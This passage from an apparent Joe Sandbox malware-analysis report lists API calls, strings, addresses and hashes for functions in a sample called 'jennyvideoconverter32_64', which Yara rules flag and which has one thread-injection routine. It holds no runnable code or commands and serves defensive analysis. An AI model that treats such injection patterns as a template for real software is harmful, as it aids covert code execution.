                                                                                  • Part of subcall function 02D98442: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 02D992B9
                                                                                  • Part of subcall function 02D98442: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 02D992CC
                                                                                  • Part of subcall function 02D98442: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 02D992DF
                                                                                • __mtinitlocks.LIBCMT ref: 02D95CD9
                                                                                • __mtterm.LIBCMT ref: 02D95CE2
                                                                                  • Part of subcall function 02D95D4A: RtlDeleteCriticalSection.NTDLL(00000000), ref: 02D98878
                                                                                  • Part of subcall function 02D95D4A: _free.LIBCMT ref: 02D9887F
                                                                                  • Part of subcall function 02D95D4A: RtlDeleteCriticalSection.NTDLL(02DB3978), ref: 02D988A1
                                                                                • __calloc_crt.LIBCMT ref: 02D95D07
                                                                                • __initptd.LIBCMT ref: 02D95D29
                                                                                • GetCurrentThreadId.KERNEL32 ref: 02D95D30
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                                • String ID:
                                                                                • API String ID: 3567560977-0
                                                                                • Opcode ID: e10b3512c79dfe38c72bbfe5e069e09e708ce2a9d46d937eef7d623f6ea6afba
                                                                                • Instruction ID: d3b0366beb22616202f467ddc1498ebd92c104ca39c36364fc4650cea4d684a2
                                                                                • Opcode Fuzzy Hash: e10b3512c79dfe38c72bbfe5e069e09e708ce2a9d46d937eef7d623f6ea6afba
                                                                                • Instruction Fuzzy Hash: 1DF06D325583115EEF667AB87C4A64A2786EB02B34F600A69F465D93C0FF21DC419961
                                                                                Function 02D93404 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,?,02D933B6,00000000), ref: 02D9341E
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 02D93425
                                                                                • RtlEncodePointer.NTDLL(00000000), ref: 02D93431
                                                                                • RtlDecodePointer.NTDLL(00000001), ref: 02D9344E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                • String ID: RoInitialize$combase.dll
                                                                                • API String ID: 3489934621-340411864
                                                                                • Opcode ID: 1a3d3840d691950f94dfe44d0c7f3b05f2ef2b323010e99306e14387669adcbb
                                                                                • Instruction ID: 5031ab4c812776ef9792b7fc398a8436a2d912c2e2cfa4515680e79e7586b6c7
                                                                                • Opcode Fuzzy Hash: 1a3d3840d691950f94dfe44d0c7f3b05f2ef2b323010e99306e14387669adcbb
                                                                                • Instruction Fuzzy Hash: 0AE0E570ED0300EAFB215F72EC59F0A77B9B705B47F605860B406D5384DBB58C689B50
                                                                                Function 02D934D9 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,02D933F3), ref: 02D934F3
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 02D934FA
                                                                                • RtlEncodePointer.NTDLL(00000000), ref: 02D93505
                                                                                • RtlDecodePointer.NTDLL(02D933F3), ref: 02D93520
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                • String ID: RoUninitialize$combase.dll
                                                                                • API String ID: 3489934621-2819208100
                                                                                • Opcode ID: 8429c219d4f8cb0fee22ffab1a49637c00a9490868cf183031f5faadc24bb893
                                                                                • Instruction ID: 932262e22bdd30f363e9606c674ac446cbf56d7e7b083b37a8c4f54a21b73b65
                                                                                • Opcode Fuzzy Hash: 8429c219d4f8cb0fee22ffab1a49637c00a9490868cf183031f5faadc24bb893
                                                                                • Instruction Fuzzy Hash: BAE09271ED0300EBFB615FA1EC29F0A7BB9F704B06F201854F906E1384DBB89D249A54
                                                                                Function 02D91E70 Relevance: 10.2, APIs: 8, Instructions: 154memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • TlsGetValue.KERNEL32(0000002A,9D194A3F,?,?,?,?,00000000,02DA69F8,000000FF,02D9210A), ref: 02D91EAA
                                                                                • TlsSetValue.KERNEL32(0000002A,02D9210A,?,?,00000000), ref: 02D91F17
                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D91F41
                                                                                • HeapFree.KERNEL32(00000000), ref: 02D91F44
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: HeapValue$FreeProcess
                                                                                • String ID:
                                                                                • API String ID: 1812714009-0
                                                                                • Opcode ID: 07940a74dc7a22d2f38c5de636bb399d6a00d46ceca0c404e695daa4f338b7ea
                                                                                • Instruction ID: adf1d39275addfe60286fd7db55e53b1a7c5c268341064bdd9644ee757c3bfa9
                                                                                • Opcode Fuzzy Hash: 07940a74dc7a22d2f38c5de636bb399d6a00d46ceca0c404e695daa4f338b7ea
                                                                                • Instruction Fuzzy Hash: 12518B36A4424A9FDB20DF29C848B2ABBE4FB45764F198658F86D973C0D770EC00CB91
                                                                                Function 02DA55C0 Relevance: 9.3, APIs: 6, Instructions: 276COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _ValidateScopeTableHandlers.LIBCMT ref: 02DA56D0
                                                                                • __FindPESection.LIBCMT ref: 02DA56EA
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FindHandlersScopeSectionTableValidate
                                                                                • String ID:
                                                                                • API String ID: 876702719-0
                                                                                • Opcode ID: 79c845d61ad4daa0db47f496e14b2c0fdb9f677182dfe899fd77c24e62c0dde3
                                                                                • Instruction ID: a223ce5fe67d2f3f91e0d9d2ea144eb5fdad561115f8eede5697729f8ecbfe53
                                                                                • Opcode Fuzzy Hash: 79c845d61ad4daa0db47f496e14b2c0fdb9f677182dfe899fd77c24e62c0dde3
                                                                                • Instruction Fuzzy Hash: 05A19076E00215CFDB25CF28E9A0FADB7A5FB44324F984669D855AB340E731EC00CB90
                                                                                Function 00405B24 Relevance: 9.1, APIs: 6, Instructions: 117COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetStringTypeW.KERNEL32(00000001,004065F4,00000001,00000000,00000103,00000001,00000000,004051A5,00200020,00000000,?,00000000,00000000,00000001), ref: 00405B63
                                                                                • GetStringTypeA.KERNEL32(00000000,00000001,004065F0,00000001,?,?,00000000,00000000,00000001), ref: 00405B7D
                                                                                • GetStringTypeA.KERNEL32(00000000,00000000,?,00000000,00200020,00000103,00000001,00000000,004051A5,00200020,00000000,?,00000000,00000000,00000001), ref: 00405BB1
                                                                                • MultiByteToWideChar.KERNEL32(004051A5,00000002,?,00000000,00000000,00000000,00000103,00000001,00000000,004051A5,00200020,00000000,?,00000000,00000000,00000001), ref: 00405BE9
                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405C3F
                                                                                • GetStringTypeW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405C51
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3335479194.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.3335479194.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_jennyvideoconverter32_64.jbxd
                                                                                Similarity
                                                                                • API ID: StringType$ByteCharMultiWide
                                                                                • String ID:
                                                                                • API String ID: 3852931651-0
                                                                                • Opcode ID: d4209c6b3d3c9ca3d0b98124627720af5477d93fa3c81dc5f6dd6a722f71754a
                                                                                • Instruction ID: b73683cf29d179dc30ac0dacbc12c8afa3e963ef4805c6be7b54428ebd0f8a91
                                                                                • Opcode Fuzzy Hash: d4209c6b3d3c9ca3d0b98124627720af5477d93fa3c81dc5f6dd6a722f71754a
                                                                                • Instruction Fuzzy Hash: 1E417B71500609EFDF219F94DD86AAF7F79EB05750F10443AFA12B6290C339A960CBA9
                                                                                Function 02D81C91 Relevance: 9.0, APIs: 6, Instructions: 39synchronizationthreadinjectionCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 02D81CB1
                                                                                • CloseHandle.KERNEL32(?), ref: 02D81CBA
                                                                                • InterlockedExchangeAdd.KERNEL32(02DB7244,00000000), ref: 02D81CC6
                                                                                • TerminateThread.KERNEL32(?,00000000), ref: 02D81CD4
                                                                                • QueueUserAPC.KERNEL32(02D81E7C,?,00000000), ref: 02D81CE1
                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 02D81CEC
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Wait$CloseExchangeHandleInterlockedMultipleObjectObjectsQueueSingleTerminateThreadUser
                                                                                • String ID:
                                                                                • API String ID: 1946104331-0
                                                                                • Opcode ID: 4d5876e98fb8dea35c45e696ab97d3777ed8b7c8ca6de067d7351432dc7e647d
                                                                                • Instruction ID: 444e0c08a3edf9ccedb0f5df00490278d12f65bf01c3b529c15427105228a372
                                                                                • Opcode Fuzzy Hash: 4d5876e98fb8dea35c45e696ab97d3777ed8b7c8ca6de067d7351432dc7e647d
                                                                                • Instruction Fuzzy Hash: 8EF04432940214BFE7105B96ED0ED5BFBBCEB85721B104A5DF66A82390DB709D14CB64
                                                                                Function 02D90800 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 179windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 02D89A0C: __EH_prolog.LIBCMT ref: 02D89A11
                                                                                  • Part of subcall function 02D89A0C: _Allocate.LIBCPMT ref: 02D89A68
                                                                                  • Part of subcall function 02D89A0C: _memmove.LIBCMT ref: 02D89ABF
                                                                                • _memset.LIBCMT ref: 02D90879
                                                                                • FormatMessageA.KERNEL32(00001200,00000000,?,00000400,?,00000010,00000000), ref: 02D908E2
                                                                                • GetLastError.KERNEL32(?,00000400,?,00000010,00000000), ref: 02D908EA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocateErrorFormatH_prologLastMessage_memmove_memset
                                                                                • String ID: Unknown error$invalid string position
                                                                                • API String ID: 1854462395-1837348584
                                                                                • Opcode ID: f587b2b1fc96edd9824c0af1712f86e835314b68236eb38d2a8c267e26b0c298
                                                                                • Instruction ID: 36203ac0a469a8136d56538ac56fa8622b1d558a179fa7a7aec995b9bd7de108
                                                                                • Opcode Fuzzy Hash: f587b2b1fc96edd9824c0af1712f86e835314b68236eb38d2a8c267e26b0c298
                                                                                • Instruction Fuzzy Hash: F051BC70208341DFEB14DF24D890B2EBBE5EB98749F54092EF48297791D771E948CBA2
                                                                                Function 004038A8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 115COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetVersionExA.KERNEL32 ref: 004038C7
                                                                                • GetEnvironmentVariableA.KERNEL32(__MSVCRT_HEAP_SELECT,?,00001090), ref: 004038FC
                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0040395C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3335479194.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.3335479194.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_jennyvideoconverter32_64.jbxd
                                                                                Similarity
                                                                                • API ID: EnvironmentFileModuleNameVariableVersion
                                                                                • String ID: __GLOBAL_HEAP_SELECTED$__MSVCRT_HEAP_SELECT
                                                                                • API String ID: 1385375860-4131005785
                                                                                • Opcode ID: 476567a857e94c6b60ab0a2bb3643b3ab9519d2bf8b3118ed803bebf3e2b5968
                                                                                • Instruction ID: dfbe321087950a958f1f5ebe55e663b38e75b845a74228cdfb1d658b51cb0ff2
                                                                                • Opcode Fuzzy Hash: 476567a857e94c6b60ab0a2bb3643b3ab9519d2bf8b3118ed803bebf3e2b5968
                                                                                • Instruction Fuzzy Hash: A53127B29052446DEB319A705C46BDF3F6C9B02305F2400FBD185F52C2D2B99F85CB18
                                                                                Function 02D91870 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 66COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • std::exception::exception.LIBCMT ref: 02D918BF
                                                                                  • Part of subcall function 02D92413: std::exception::_Copy_str.LIBCMT ref: 02D9242C
                                                                                  • Part of subcall function 02D90C90: __CxxThrowException@8.LIBCMT ref: 02D90CEE
                                                                                • std::exception::exception.LIBCMT ref: 02D9191E
                                                                                Strings
                                                                                • boost unique_lock owns already the mutex, xrefs: 02D9190D
                                                                                • boost unique_lock has no mutex, xrefs: 02D918AE
                                                                                • $, xrefs: 02D91923
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: std::exception::exception$Copy_strException@8Throwstd::exception::_
                                                                                • String ID: $$boost unique_lock has no mutex$boost unique_lock owns already the mutex
                                                                                • API String ID: 2140441600-46888669
                                                                                • Opcode ID: 3d2b4ab8f0332ae64a0387a7719e1d1ad5731f07111aa6328529e4922666c2a6
                                                                                • Instruction ID: 9c89bdf564ff23cb0b17a08eec86d70b3c10028a723b33f114aaa2dbd36f799d
                                                                                • Opcode Fuzzy Hash: 3d2b4ab8f0332ae64a0387a7719e1d1ad5731f07111aa6328529e4922666c2a6
                                                                                • Instruction Fuzzy Hash: 7C21D3B15083809FDB60DF24C554B5BBBE9BB89708F504A5EF8A587380D7B5D808CF92
                                                                                Function 02D949BC Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 60COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __getptd_noexit.LIBCMT ref: 02D949C0
                                                                                  • Part of subcall function 02D95BB2: GetLastError.KERNEL32(76230A60,7622F550,02D95DA0,02D92F73,7622F550,?,02D8606D,00000104,76230A60,7622F550,ntdll.dll,?,?,?,02D86508), ref: 02D95BB4
                                                                                  • Part of subcall function 02D95BB2: __calloc_crt.LIBCMT ref: 02D95BD5
                                                                                  • Part of subcall function 02D95BB2: __initptd.LIBCMT ref: 02D95BF7
                                                                                  • Part of subcall function 02D95BB2: GetCurrentThreadId.KERNEL32 ref: 02D95BFE
                                                                                  • Part of subcall function 02D95BB2: SetLastError.KERNEL32(00000000,02D8606D,00000104,76230A60,7622F550,ntdll.dll,?,?,?,02D86508), ref: 02D95C16
                                                                                • __calloc_crt.LIBCMT ref: 02D949E3
                                                                                • __get_sys_err_msg.LIBCMT ref: 02D94A01
                                                                                • __invoke_watson.LIBCMT ref: 02D94A1E
                                                                                Strings
                                                                                • Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 02D949CB, 02D949F1
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLast__calloc_crt$CurrentThread__get_sys_err_msg__getptd_noexit__initptd__invoke_watson
                                                                                • String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
                                                                                • API String ID: 109275364-798102604
                                                                                • Opcode ID: 50ae79790e424f859b8f72d1f4c245ae0f5f2a316d306698edc77ce26cb69b37
                                                                                • Instruction ID: b564133d0dddbeddae58c44ac2b1f11a456c87c950f0fb9512c32ceaad1bbe97
                                                                                • Opcode Fuzzy Hash: 50ae79790e424f859b8f72d1f4c245ae0f5f2a316d306698edc77ce26cb69b37
                                                                                • Instruction Fuzzy Hash: 0CF0E9327447157FEF216A2A9C40A2B729DEF41AA4F00067EFDC5D7302EB21DC5286A5
                                                                                Function 02D82341 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • InterlockedExchange.KERNEL32(?,00000001), ref: 02D82350
                                                                                • InterlockedExchange.KERNEL32(?,00000001), ref: 02D82360
                                                                                • PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 02D82370
                                                                                • GetLastError.KERNEL32 ref: 02D8237A
                                                                                  • Part of subcall function 02D81712: __EH_prolog.LIBCMT ref: 02D81717
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExchangeInterlocked$CompletionErrorH_prologLastPostQueuedStatus
                                                                                • String ID: pqcs
                                                                                • API String ID: 1619523792-2559862021
                                                                                • Opcode ID: 97b0c3abca7b4f8271297d0559353c2196d4e39b333f7f0be5ddcfc31f86f8c2
                                                                                • Instruction ID: 4a660f915e76d3cc0f1b59c90c66b52d81847c70f5b087f8956ef95cfab47d66
                                                                                • Opcode Fuzzy Hash: 97b0c3abca7b4f8271297d0559353c2196d4e39b333f7f0be5ddcfc31f86f8c2
                                                                                • Instruction Fuzzy Hash: ABF0BD71940304ABEB10AAB4D819FAFB7BCEB45701F104569E949D2240E770DD148BA5
                                                                                Function 02D84030 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 26memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __EH_prolog.LIBCMT ref: 02D84035
                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 02D84042
                                                                                • RtlAllocateHeap.NTDLL(00000000), ref: 02D84049
                                                                                • std::exception::exception.LIBCMT ref: 02D84063
                                                                                  • Part of subcall function 02D8A5FD: __EH_prolog.LIBCMT ref: 02D8A602
                                                                                  • Part of subcall function 02D8A5FD: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 02D8A611
                                                                                  • Part of subcall function 02D8A5FD: __CxxThrowException@8.LIBCMT ref: 02D8A630
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prologHeap$AllocateConcurrency::cancellation_token::_Exception@8FromImplProcessThrowstd::exception::exception
                                                                                • String ID: bad allocation
                                                                                • API String ID: 3112922283-2104205924
                                                                                • Opcode ID: 243847f3e606a4ae0570d91b2d91848a8c9da38db7498a919b183264de8becb8
                                                                                • Instruction ID: 4f76a94a182c968dacd8ee88fbc6807b37fb462a7e08a0d5cacae1d02f5c03b2
                                                                                • Opcode Fuzzy Hash: 243847f3e606a4ae0570d91b2d91848a8c9da38db7498a919b183264de8becb8
                                                                                • Instruction Fuzzy Hash: 18F082B2D44209EBDB00EFE0D919FAFB778FB04301F904545E915A2340D7754A14CF65
                                                                                Function 004036D0 Relevance: 7.6, APIs: 5, Instructions: 143COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetStartupInfoA.KERNEL32(?), ref: 00403729
                                                                                • GetFileType.KERNEL32(00000800), ref: 004037CF
                                                                                • GetStdHandle.KERNEL32(-000000F6), ref: 00403828
                                                                                • GetFileType.KERNEL32(00000000), ref: 00403836
                                                                                • SetHandleCount.KERNEL32 ref: 0040386D
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3335479194.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.3335479194.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_jennyvideoconverter32_64.jbxd
                                                                                Similarity
                                                                                • API ID: FileHandleType$CountInfoStartup
                                                                                • String ID:
                                                                                • API String ID: 1710529072-0
                                                                                • Opcode ID: 1ce75c326bde2c2d02afe177aeb4995e441bbd179d01f1070c3041f2ee44749b
                                                                                • Instruction ID: 340931fb5571d0dd89e9413526c141aa1936fc067e7847d678db743c6b9c99aa
                                                                                • Opcode Fuzzy Hash: 1ce75c326bde2c2d02afe177aeb4995e441bbd179d01f1070c3041f2ee44749b
                                                                                • Instruction Fuzzy Hash: A65136B25003508BD7209F28CD48B563FE8EB01336F19C67AE492EB2E1C738C955C75A
                                                                                Function 02D91BC0 Relevance: 7.6, APIs: 5, Instructions: 117COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 02D91990: CloseHandle.KERNEL32(00000000,9D194A3F), ref: 02D919E1
                                                                                  • Part of subcall function 02D91990: WaitForSingleObject.KERNEL32(?,000000FF,9D194A3F,?,?,?,?,9D194A3F,02D91963,9D194A3F), ref: 02D919F8
                                                                                • ReleaseSemaphore.KERNEL32(?,?,00000000), ref: 02D91C5E
                                                                                • ReleaseSemaphore.KERNEL32(?,?,00000000), ref: 02D91C7E
                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 02D91CB7
                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?), ref: 02D91D0B
                                                                                • SetEvent.KERNEL32(?), ref: 02D91D12
                                                                                  • Part of subcall function 02D8418C: CloseHandle.KERNEL32(00000000,?,02D91C45), ref: 02D841B0
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseHandle$ReleaseSemaphore$EventObjectSingleWait
                                                                                • String ID:
                                                                                • API String ID: 4166353394-0
                                                                                • Opcode ID: 3d20a1eac598a68d203fc7fd2a9a47f04f8cc49993df89f3fa4a82fa0ff703ec
                                                                                • Instruction ID: 3791935995e0732e0a2f63f21dc90a0195362187fc101ad4d9d198de33b7b794
                                                                                • Opcode Fuzzy Hash: 3d20a1eac598a68d203fc7fd2a9a47f04f8cc49993df89f3fa4a82fa0ff703ec
                                                                                • Instruction Fuzzy Hash: F0418C716403129BEF299F28DC80B2AB7A4EF45624F240668FC199B395D735DC11CBA5
                                                                                Function 02D8E02B Relevance: 7.6, APIs: 5, Instructions: 92COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __EH_prolog.LIBCMT ref: 02D8E030
                                                                                  • Part of subcall function 02D81A01: TlsGetValue.KERNEL32 ref: 02D81A0A
                                                                                • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02D8E0AF
                                                                                • RtlEnterCriticalSection.NTDLL(?), ref: 02D8E0CB
                                                                                • InterlockedIncrement.KERNEL32(02DB5180), ref: 02D8E0F0
                                                                                • RtlLeaveCriticalSection.NTDLL(?), ref: 02D8E105
                                                                                  • Part of subcall function 02D827F3: SetWaitableTimer.KERNEL32(00000000,?,000493E0,00000000,00000000,00000000,00000000,00000000,0000000A,00000000), ref: 02D8284E
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalInterlockedSection$EnterExchangeH_prologIncrementLeaveTimerValueWaitable
                                                                                • String ID:
                                                                                • API String ID: 1578506061-0
                                                                                • Opcode ID: 5810ea39349dbcaa909bff89ef934c42d15730dde9b5a96591d308eb4fa3dff9
                                                                                • Instruction ID: 28840a30835bf7c28ff89f9c8b8e7a3a8e93d29aba1b605562228283bdf8e5cf
                                                                                • Opcode Fuzzy Hash: 5810ea39349dbcaa909bff89ef934c42d15730dde9b5a96591d308eb4fa3dff9
                                                                                • Instruction Fuzzy Hash: 2A3134B1901205EFCB10EFA9C544AAEBBF9FF08310F14895AE849D7740E735AA04CFA0
                                                                                Function 02DA02E4 Relevance: 7.6, APIs: 5, Instructions: 67COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _malloc.LIBCMT ref: 02DA02F0
                                                                                  • Part of subcall function 02D92EEC: __FF_MSGBANNER.LIBCMT ref: 02D92F03
                                                                                  • Part of subcall function 02D92EEC: __NMSG_WRITE.LIBCMT ref: 02D92F0A
                                                                                  • Part of subcall function 02D92EEC: RtlAllocateHeap.NTDLL(007A0000,00000000,00000001), ref: 02D92F2F
                                                                                • _free.LIBCMT ref: 02DA0303
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocateHeap_free_malloc
                                                                                • String ID:
                                                                                • API String ID: 1020059152-0
                                                                                • Opcode ID: d721a1eef0d738939521d0f9ce0b359041bcd83178ce019c731f54e3fa947bc7
                                                                                • Instruction ID: a6d664d346628e0313c3947bbe030724603b4c24c47f6778c66aa2c06306a1a9
                                                                                • Opcode Fuzzy Hash: d721a1eef0d738939521d0f9ce0b359041bcd83178ce019c731f54e3fa947bc7
                                                                                • Instruction Fuzzy Hash: 3211E532949615EFDF222FB4B868F5A3799DF05372F104929F9899A390DB31DC50CAE0
                                                                                Function 02D821D5 Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __EH_prolog.LIBCMT ref: 02D821DA
                                                                                • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02D821ED
                                                                                • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,00000001), ref: 02D82224
                                                                                • TlsSetValue.KERNEL32(?,?,?,?,?,?,?,?,?,00000001), ref: 02D82237
                                                                                • TlsSetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02D82261
                                                                                  • Part of subcall function 02D82341: InterlockedExchange.KERNEL32(?,00000001), ref: 02D82350
                                                                                  • Part of subcall function 02D82341: InterlockedExchange.KERNEL32(?,00000001), ref: 02D82360
                                                                                  • Part of subcall function 02D82341: PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 02D82370
                                                                                  • Part of subcall function 02D82341: GetLastError.KERNEL32 ref: 02D8237A
                                                                                Memory Dump Source
